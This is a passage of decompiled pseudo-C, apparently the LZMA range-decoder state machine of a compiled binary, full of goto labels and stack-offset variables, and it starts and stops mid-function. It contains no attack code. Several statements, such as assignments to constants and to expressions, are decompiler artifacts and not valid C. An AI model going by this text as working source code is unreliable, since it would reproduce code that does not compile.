                                                                                    											if(_t538 == 0) {
                                                                                    												goto L171;
                                                                                    											} else {
                                                                                    												goto L20;
                                                                                    											}
                                                                                    										case 2:
                                                                                    											L24:
                                                                                    											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
                                                                                    											 *(_t644 - 0x84) = 6;
                                                                                    											 *(_t644 - 0x4c) = _t557;
                                                                                    											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
                                                                                    											goto L132;
                                                                                    										case 3:
                                                                                    											L21:
                                                                                    											__eflags =  *(_t644 - 0x6c);
                                                                                    											if( *(_t644 - 0x6c) == 0) {
                                                                                    												L158:
                                                                                    												 *(_t644 - 0x88) = 3;
                                                                                    												goto L170;
                                                                                    											}
                                                                                    											L22:
                                                                                    											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                                                    											_t67 = _t644 - 0x70;
                                                                                    											 *_t67 =  &(( *(_t644 - 0x70))[1]);
                                                                                    											__eflags =  *_t67;
                                                                                    											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                                                                    											L23:
                                                                                    											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
                                                                                    											if( *(_t644 - 0x48) != 0) {
                                                                                    												goto L21;
                                                                                    											}
                                                                                    											goto L24;
                                                                                    										case 4:
                                                                                    											L133:
                                                                                    											_t559 =  *_t642;
                                                                                    											_t626 = _t559 & 0x0000ffff;
                                                                                    											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
                                                                                    											if( *(_t644 - 0xc) >= _t596) {
                                                                                    												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
                                                                                    												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
                                                                                    												 *(_t644 - 0x40) = 1;
                                                                                    												_t560 = _t559 - (_t559 >> 5);
                                                                                    												__eflags = _t560;
                                                                                    												 *_t642 = _t560;
                                                                                    											} else {
                                                                                    												 *(_t644 - 0x10) = _t596;
                                                                                    												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
                                                                                    												 *_t642 = (0x800 - _t626 >> 5) + _t559;
                                                                                    											}
                                                                                    											if( *(_t644 - 0x10) >= 0x1000000) {
                                                                                    												goto L139;
                                                                                    											} else {
                                                                                    												goto L137;
                                                                                    											}
                                                                                    										case 5:
                                                                                    											L137:
                                                                                    											if( *(_t644 - 0x6c) == 0) {
                                                                                    												L168:
                                                                                    												 *(_t644 - 0x88) = 5;
                                                                                    												goto L170;
                                                                                    											}
                                                                                    											L138:
                                                                                    											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
                                                                                    											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                                                    											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                                                                    											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                                                                    											L139:
                                                                                    											_t537 =  *(_t644 - 0x84);
                                                                                    											L140:
                                                                                    											 *(_t644 - 0x88) = _t537;
                                                                                    											goto L1;
                                                                                    										case 6:
                                                                                    											L25:
                                                                                    											__edx = 0;
                                                                                    											__eflags =  *(__ebp - 0x40);
                                                                                    											if( *(__ebp - 0x40) != 0) {
                                                                                    												L36:
                                                                                    												__eax =  *(__ebp - 4);
                                                                                    												__ecx =  *(__ebp - 0x38);
                                                                                    												 *(__ebp - 0x34) = 1;
                                                                                    												 *(__ebp - 0x84) = 7;
                                                                                    												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                                    												goto L132;
                                                                                    											}
                                                                                    											L26:
                                                                                    											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                                    											__esi =  *(__ebp - 0x60);
                                                                                    											__cl = 8;
                                                                                    											__cl = 8 -  *(__ebp - 0x3c);
                                                                                    											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                                    											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                                    											__ecx =  *(__ebp - 0x3c);
                                                                                    											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                                    											__ecx =  *(__ebp - 4);
                                                                                    											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                                    											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                                    											__eflags =  *(__ebp - 0x38) - 4;
                                                                                    											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                    											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                    											if( *(__ebp - 0x38) >= 4) {
                                                                                    												__eflags =  *(__ebp - 0x38) - 0xa;
                                                                                    												if( *(__ebp - 0x38) >= 0xa) {
                                                                                    													_t98 = __ebp - 0x38;
                                                                                    													 *_t98 =  *(__ebp - 0x38) - 6;
                                                                                    													__eflags =  *_t98;
                                                                                    												} else {
                                                                                    													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                                    												}
                                                                                    											} else {
                                                                                    												 *(__ebp - 0x38) = 0;
                                                                                    											}
                                                                                    											__eflags =  *(__ebp - 0x34) - __edx;
                                                                                    											if( *(__ebp - 0x34) == __edx) {
                                                                                    												L35:
                                                                                    												__ebx = 0;
                                                                                    												__ebx = 1;
                                                                                    												goto L61;
                                                                                    											} else {
                                                                                    												L32:
                                                                                    												__eax =  *(__ebp - 0x14);
                                                                                    												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                    												__eflags = __eax -  *(__ebp - 0x74);
                                                                                    												if(__eax >=  *(__ebp - 0x74)) {
                                                                                    													__eax = __eax +  *(__ebp - 0x74);
                                                                                    													__eflags = __eax;
                                                                                    												}
                                                                                    												__ecx =  *(__ebp - 8);
                                                                                    												__ebx = 0;
                                                                                    												__ebx = 1;
                                                                                    												__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                    												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                                    												goto L41;
                                                                                    											}
                                                                                    										case 7:
                                                                                    											L66:
                                                                                    											__eflags =  *(__ebp - 0x40) - 1;
                                                                                    											if( *(__ebp - 0x40) != 1) {
                                                                                    												L68:
                                                                                    												__eax =  *(__ebp - 0x24);
                                                                                    												 *(__ebp - 0x80) = 0x16;
                                                                                    												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                    												__eax =  *(__ebp - 0x28);
                                                                                    												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                    												__eax =  *(__ebp - 0x2c);
                                                                                    												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                    												__eax = 0;
                                                                                    												__eflags =  *(__ebp - 0x38) - 7;
                                                                                    												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                    												__al = __al & 0x000000fd;
                                                                                    												__eax = (__eflags >= 0) - 1 + 0xa;
                                                                                    												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                                    												__eax =  *(__ebp - 4);
                                                                                    												__eax =  *(__ebp - 4) + 0x664;
                                                                                    												__eflags = __eax;
                                                                                    												 *(__ebp - 0x58) = __eax;
                                                                                    												goto L69;
                                                                                    											}
                                                                                    											L67:
                                                                                    											__eax =  *(__ebp - 4);
                                                                                    											__ecx =  *(__ebp - 0x38);
                                                                                    											 *(__ebp - 0x84) = 8;
                                                                                    											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                                    											goto L132;
                                                                                    										case 8:
                                                                                    											L70:
                                                                                    											__eflags =  *(__ebp - 0x40);
                                                                                    											if( *(__ebp - 0x40) != 0) {
                                                                                    												__eax =  *(__ebp - 4);
                                                                                    												__ecx =  *(__ebp - 0x38);
                                                                                    												 *(__ebp - 0x84) = 0xa;
                                                                                    												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                                    											} else {
                                                                                    												__eax =  *(__ebp - 0x38);
                                                                                    												__ecx =  *(__ebp - 4);
                                                                                    												__eax =  *(__ebp - 0x38) + 0xf;
                                                                                    												 *(__ebp - 0x84) = 9;
                                                                                    												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                                    												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                                    											}
                                                                                    											goto L132;
                                                                                    										case 9:
                                                                                    											L73:
                                                                                    											__eflags =  *(__ebp - 0x40);
                                                                                    											if( *(__ebp - 0x40) != 0) {
                                                                                    												goto L90;
                                                                                    											}
                                                                                    											L74:
                                                                                    											__eflags =  *(__ebp - 0x60);
                                                                                    											if( *(__ebp - 0x60) == 0) {
                                                                                    												goto L171;
                                                                                    											}
                                                                                    											L75:
                                                                                    											__eax = 0;
                                                                                    											__eflags =  *(__ebp - 0x38) - 7;
                                                                                    											_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                                                                    											__eflags = _t259;
                                                                                    											0 | _t259 = _t259 + _t259 + 9;
                                                                                    											 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                                                                    											goto L76;
                                                                                    										case 0xa:
                                                                                    											L82:
                                                                                    											__eflags =  *(__ebp - 0x40);
                                                                                    											if( *(__ebp - 0x40) != 0) {
                                                                                    												L84:
                                                                                    												__eax =  *(__ebp - 4);
                                                                                    												__ecx =  *(__ebp - 0x38);
                                                                                    												 *(__ebp - 0x84) = 0xb;
                                                                                    												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                                    												goto L132;
                                                                                    											}
                                                                                    											L83:
                                                                                    											__eax =  *(__ebp - 0x28);
                                                                                    											goto L89;
                                                                                    										case 0xb:
                                                                                    											L85:
                                                                                    											__eflags =  *(__ebp - 0x40);
                                                                                    											if( *(__ebp - 0x40) != 0) {
                                                                                    												__ecx =  *(__ebp - 0x24);
                                                                                    												__eax =  *(__ebp - 0x20);
                                                                                    												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                    											} else {
                                                                                    												__eax =  *(__ebp - 0x24);
                                                                                    											}
                                                                                    											__ecx =  *(__ebp - 0x28);
                                                                                    											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                    											L89:
                                                                                    											__ecx =  *(__ebp - 0x2c);
                                                                                    											 *(__ebp - 0x2c) = __eax;
                                                                                    											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                    											L90:
                                                                                    											__eax =  *(__ebp - 4);
                                                                                    											 *(__ebp - 0x80) = 0x15;
                                                                                    											__eax =  *(__ebp - 4) + 0xa68;
                                                                                    											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                                    											goto L69;
                                                                                    										case 0xc:
                                                                                    											L99:
                                                                                    											__eflags =  *(__ebp - 0x6c);
                                                                                    											if( *(__ebp - 0x6c) == 0) {
                                                                                    												L164:
                                                                                    												 *(__ebp - 0x88) = 0xc;
                                                                                    												goto L170;
                                                                                    											}
                                                                                    											L100:
                                                                                    											__ecx =  *(__ebp - 0x70);
                                                                                    											__eax =  *(__ebp - 0xc);
                                                                                    											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                    											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                    											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    											_t334 = __ebp - 0x70;
                                                                                    											 *_t334 =  *(__ebp - 0x70) + 1;
                                                                                    											__eflags =  *_t334;
                                                                                    											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    											__eax =  *(__ebp - 0x2c);
                                                                                    											goto L101;
                                                                                    										case 0xd:
                                                                                    											L37:
                                                                                    											__eflags =  *(__ebp - 0x6c);
                                                                                    											if( *(__ebp - 0x6c) == 0) {
                                                                                    												L159:
                                                                                    												 *(__ebp - 0x88) = 0xd;
                                                                                    												goto L170;
                                                                                    											}
                                                                                    											L38:
                                                                                    											__ecx =  *(__ebp - 0x70);
                                                                                    											__eax =  *(__ebp - 0xc);
                                                                                    											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                    											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                    											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    											_t122 = __ebp - 0x70;
                                                                                    											 *_t122 =  *(__ebp - 0x70) + 1;
                                                                                    											__eflags =  *_t122;
                                                                                    											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    											L39:
                                                                                    											__eax =  *(__ebp - 0x40);
                                                                                    											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                    											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                                    												goto L48;
                                                                                    											}
                                                                                    											L40:
                                                                                    											__eflags = __ebx - 0x100;
                                                                                    											if(__ebx >= 0x100) {
                                                                                    												goto L54;
                                                                                    											}
                                                                                    											L41:
                                                                                    											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                                    											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                                    											__ecx =  *(__ebp - 0x58);
                                                                                    											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                                    											 *(__ebp - 0x48) = __eax;
                                                                                    											__eax = __eax + 1;
                                                                                    											__eax = __eax << 8;
                                                                                    											__eax = __eax + __ebx;
                                                                                    											__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                                    											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                    											__ax =  *__esi;
                                                                                    											 *(__ebp - 0x54) = __esi;
                                                                                    											__edx = __ax & 0x0000ffff;
                                                                                    											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                                    											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                    											if( *(__ebp - 0xc) >= __ecx) {
                                                                                    												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                    												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                    												__cx = __ax;
                                                                                    												 *(__ebp - 0x40) = 1;
                                                                                    												__cx = __ax >> 5;
                                                                                    												__eflags = __eax;
                                                                                    												__ebx = __ebx + __ebx + 1;
                                                                                    												 *__esi = __ax;
                                                                                    											} else {
                                                                                    												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                                    												 *(__ebp - 0x10) = __ecx;
                                                                                    												0x800 = 0x800 - __edx;
                                                                                    												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                    												__ebx = __ebx + __ebx;
                                                                                    												 *__esi = __cx;
                                                                                    											}
                                                                                    											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                    											 *(__ebp - 0x44) = __ebx;
                                                                                    											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                    												goto L39;
                                                                                    											} else {
                                                                                    												L45:
                                                                                    												goto L37;
                                                                                    											}
                                                                                    										case 0xe:
                                                                                    											L46:
                                                                                    											__eflags =  *(__ebp - 0x6c);
                                                                                    											if( *(__ebp - 0x6c) == 0) {
                                                                                    												L160:
                                                                                    												 *(__ebp - 0x88) = 0xe;
                                                                                    												goto L170;
                                                                                    											}
                                                                                    											L47:
                                                                                    											__ecx =  *(__ebp - 0x70);
                                                                                    											__eax =  *(__ebp - 0xc);
                                                                                    											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                    											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                    											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    											_t156 = __ebp - 0x70;
                                                                                    											 *_t156 =  *(__ebp - 0x70) + 1;
                                                                                    											__eflags =  *_t156;
                                                                                    											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    											while(1) {
                                                                                    												L48:
                                                                                    												__eflags = __ebx - 0x100;
                                                                                    												if(__ebx >= 0x100) {
                                                                                    													break;
                                                                                    												}
                                                                                    												L49:
                                                                                    												__eax =  *(__ebp - 0x58);
                                                                                    												__edx = __ebx + __ebx;
                                                                                    												__ecx =  *(__ebp - 0x10);
                                                                                    												__esi = __edx + __eax;
                                                                                    												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                    												__ax =  *__esi;
                                                                                    												 *(__ebp - 0x54) = __esi;
                                                                                    												__edi = __ax & 0x0000ffff;
                                                                                    												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                    												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                    												if( *(__ebp - 0xc) >= __ecx) {
                                                                                    													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                    													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                    													__cx = __ax;
                                                                                    													_t170 = __edx + 1; // 0x1
                                                                                    													__ebx = _t170;
                                                                                    													__cx = __ax >> 5;
                                                                                    													__eflags = __eax;
                                                                                    													 *__esi = __ax;
                                                                                    												} else {
                                                                                    													 *(__ebp - 0x10) = __ecx;
                                                                                    													0x800 = 0x800 - __edi;
                                                                                    													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                    													__ebx = __ebx + __ebx;
                                                                                    													 *__esi = __cx;
                                                                                    												}
                                                                                    												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                    												 *(__ebp - 0x44) = __ebx;
                                                                                    												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                    													continue;
                                                                                    												} else {
                                                                                    													L53:
                                                                                    													goto L46;
                                                                                    												}
                                                                                    											}
                                                                                    											L54:
                                                                                    											_t173 = __ebp - 0x34;
                                                                                    											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                                    											__eflags =  *_t173;
                                                                                    											goto L55;
                                                                                    										case 0xf:
                                                                                    											L58:
                                                                                    											__eflags =  *(__ebp - 0x6c);
                                                                                    											if( *(__ebp - 0x6c) == 0) {
                                                                                    												L161:
                                                                                    												 *(__ebp - 0x88) = 0xf;
                                                                                    												goto L170;
                                                                                    											}
                                                                                    											L59:
                                                                                    											__ecx =  *(__ebp - 0x70);
                                                                                    											__eax =  *(__ebp - 0xc);
                                                                                    											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                    											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                    											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    											_t203 = __ebp - 0x70;
                                                                                    											 *_t203 =  *(__ebp - 0x70) + 1;
                                                                                    											__eflags =  *_t203;
                                                                                    											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    											L60:
                                                                                    											__eflags = __ebx - 0x100;
                                                                                    											if(__ebx >= 0x100) {
                                                                                    												L55:
                                                                                    												__al =  *(__ebp - 0x44);
                                                                                    												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                                    												goto L56;
                                                                                    											}
                                                                                    											L61:
                                                                                    											__eax =  *(__ebp - 0x58);
                                                                                    											__edx = __ebx + __ebx;
                                                                                    											__ecx =  *(__ebp - 0x10);
                                                                                    											__esi = __edx + __eax;
                                                                                    											__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                    											__ax =  *__esi;
                                                                                    											 *(__ebp - 0x54) = __esi;
                                                                                    											__edi = __ax & 0x0000ffff;
                                                                                    											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                    											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                    											if( *(__ebp - 0xc) >= __ecx) {
                                                                                    												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                    												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                    												__cx = __ax;
                                                                                    												_t217 = __edx + 1; // 0x1
                                                                                    												__ebx = _t217;
                                                                                    												__cx = __ax >> 5;
                                                                                    												__eflags = __eax;
                                                                                    												 *__esi = __ax;
                                                                                    											} else {
                                                                                    												 *(__ebp - 0x10) = __ecx;
                                                                                    												0x800 = 0x800 - __edi;
                                                                                    												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                    												__ebx = __ebx + __ebx;
                                                                                    												 *__esi = __cx;
                                                                                    											}
                                                                                    											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                    											 *(__ebp - 0x44) = __ebx;
                                                                                    											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                    												goto L60;
                                                                                    											} else {
                                                                                    												L65:
                                                                                    												goto L58;
                                                                                    											}
                                                                                    										case 0x10:
                                                                                    											L109:
                                                                                    											__eflags =  *(__ebp - 0x6c);
                                                                                    											if( *(__ebp - 0x6c) == 0) {
                                                                                    												L165:
                                                                                    												 *(__ebp - 0x88) = 0x10;
                                                                                    												goto L170;
                                                                                    											}
                                                                                    											L110:
                                                                                    											__ecx =  *(__ebp - 0x70);
                                                                                    											__eax =  *(__ebp - 0xc);
                                                                                    											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                    											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                    											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    											_t365 = __ebp - 0x70;
                                                                                    											 *_t365 =  *(__ebp - 0x70) + 1;
                                                                                    											__eflags =  *_t365;
                                                                                    											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    											goto L111;
                                                                                    										case 0x11:
                                                                                    											L69:
                                                                                    											__esi =  *(__ebp - 0x58);
                                                                                    											 *(__ebp - 0x84) = 0x12;
                                                                                    											goto L132;
                                                                                    										case 0x12:
                                                                                    											L128:
                                                                                    											__eflags =  *(__ebp - 0x40);
                                                                                    											if( *(__ebp - 0x40) != 0) {
                                                                                    												L131:
                                                                                    												__eax =  *(__ebp - 0x58);
                                                                                    												 *(__ebp - 0x84) = 0x13;
                                                                                    												__esi =  *(__ebp - 0x58) + 2;
                                                                                    												L132:
                                                                                    												 *(_t644 - 0x54) = _t642;
                                                                                    												goto L133;
                                                                                    											}
                                                                                    											L129:
                                                                                    											__eax =  *(__ebp - 0x4c);
                                                                                    											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                                    											__ecx =  *(__ebp - 0x58);
                                                                                    											__eax =  *(__ebp - 0x4c) << 4;
                                                                                    											__eflags = __eax;
                                                                                    											__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                                    											goto L130;
                                                                                    										case 0x13:
                                                                                    											L141:
                                                                                    											__eflags =  *(__ebp - 0x40);
                                                                                    											if( *(__ebp - 0x40) != 0) {
                                                                                    												L143:
                                                                                    												_t469 = __ebp - 0x58;
                                                                                    												 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                                    												__eflags =  *_t469;
                                                                                    												 *(__ebp - 0x30) = 0x10;
                                                                                    												 *(__ebp - 0x40) = 8;
                                                                                    												L144:
                                                                                    												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
                                                                                    												L145:
                                                                                    												 *(_t644 - 0x50) = 1;
                                                                                    												 *(_t644 - 0x48) =  *(_t644 - 0x40);
                                                                                    												goto L149;
                                                                                    											}
                                                                                    											L142:
                                                                                    											__eax =  *(__ebp - 0x4c);
                                                                                    											__ecx =  *(__ebp - 0x58);
                                                                                    											__eax =  *(__ebp - 0x4c) << 4;
                                                                                    											 *(__ebp - 0x30) = 8;
                                                                                    											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                                    											L130:
                                                                                    											 *(__ebp - 0x58) = __eax;
                                                                                    											 *(__ebp - 0x40) = 3;
                                                                                    											goto L144;
                                                                                    										case 0x14:
                                                                                    											L156:
                                                                                    											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                                    											__eax =  *(__ebp - 0x80);
                                                                                    											while(1) {
                                                                                    												L140:
                                                                                    												 *(_t644 - 0x88) = _t537;
                                                                                    												goto L1;
                                                                                    											}
                                                                                    										case 0x15:
                                                                                    											L91:
                                                                                    											__eax = 0;
                                                                                    											__eflags =  *(__ebp - 0x38) - 7;
                                                                                    											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                    											__al = __al & 0x000000fd;
                                                                                    											__eax = (__eflags >= 0) - 1 + 0xb;
                                                                                    											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                                    											goto L120;
                                                                                    										case 0x16:
                                                                                    											goto L0;
                                                                                    										case 0x17:
                                                                                    											while(1) {
                                                                                    												L145:
                                                                                    												 *(_t644 - 0x50) = 1;
                                                                                    												 *(_t644 - 0x48) =  *(_t644 - 0x40);
                                                                                    												goto L149;
                                                                                    											}
                                                                                    										case 0x18:
                                                                                    											goto L146;
                                                                                    										case 0x19:
                                                                                    											L94:
                                                                                    											__eflags = __ebx - 4;
                                                                                    											if(__ebx < 4) {
                                                                                    												L98:
                                                                                    												 *(__ebp - 0x2c) = __ebx;
                                                                                    												L119:
                                                                                    												_t393 = __ebp - 0x2c;
                                                                                    												 *_t393 =  *(__ebp - 0x2c) + 1;
                                                                                    												__eflags =  *_t393;
                                                                                    												L120:
                                                                                    												__eax =  *(__ebp - 0x2c);
                                                                                    												__eflags = __eax;
                                                                                    												if(__eax == 0) {
                                                                                    													L166:
                                                                                    													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                                                    													goto L170;
                                                                                    												}
                                                                                    												L121:
                                                                                    												__eflags = __eax -  *(__ebp - 0x60);
                                                                                    												if(__eax >  *(__ebp - 0x60)) {
                                                                                    													goto L171;
                                                                                    												}
                                                                                    												L122:
                                                                                    												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                                                    												__eax =  *(__ebp - 0x30);
                                                                                    												_t400 = __ebp - 0x60;
                                                                                    												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                                                    												__eflags =  *_t400;
                                                                                    												goto L123;
                                                                                    											}
                                                                                    											L95:
                                                                                    											__ecx = __ebx;
                                                                                    											__eax = __ebx;
                                                                                    											__ecx = __ebx >> 1;
                                                                                    											__eax = __ebx & 0x00000001;
                                                                                    											__ecx = (__ebx >> 1) - 1;
                                                                                    											__al = __al | 0x00000002;
                                                                                    											__eax = (__ebx & 0x00000001) << __cl;
                                                                                    											__eflags = __ebx - 0xe;
                                                                                    											 *(__ebp - 0x2c) = __eax;
                                                                                    											if(__ebx >= 0xe) {
                                                                                    												L97:
                                                                                    												__ebx = 0;
                                                                                    												 *(__ebp - 0x48) = __ecx;
                                                                                    												L102:
                                                                                    												__eflags =  *(__ebp - 0x48);
                                                                                    												if( *(__ebp - 0x48) <= 0) {
                                                                                    													L107:
                                                                                    													__eax = __eax + __ebx;
                                                                                    													 *(__ebp - 0x40) = 4;
                                                                                    													 *(__ebp - 0x2c) = __eax;
                                                                                    													__eax =  *(__ebp - 4);
                                                                                    													__eax =  *(__ebp - 4) + 0x644;
                                                                                    													__eflags = __eax;
                                                                                    													L108:
                                                                                    													__ebx = 0;
                                                                                    													 *(__ebp - 0x58) = __eax;
                                                                                    													 *(__ebp - 0x50) = 1;
                                                                                    													 *(__ebp - 0x44) = 0;
                                                                                    													 *(__ebp - 0x48) = 0;
                                                                                    													L112:
                                                                                    													__eax =  *(__ebp - 0x40);
                                                                                    													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                    													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
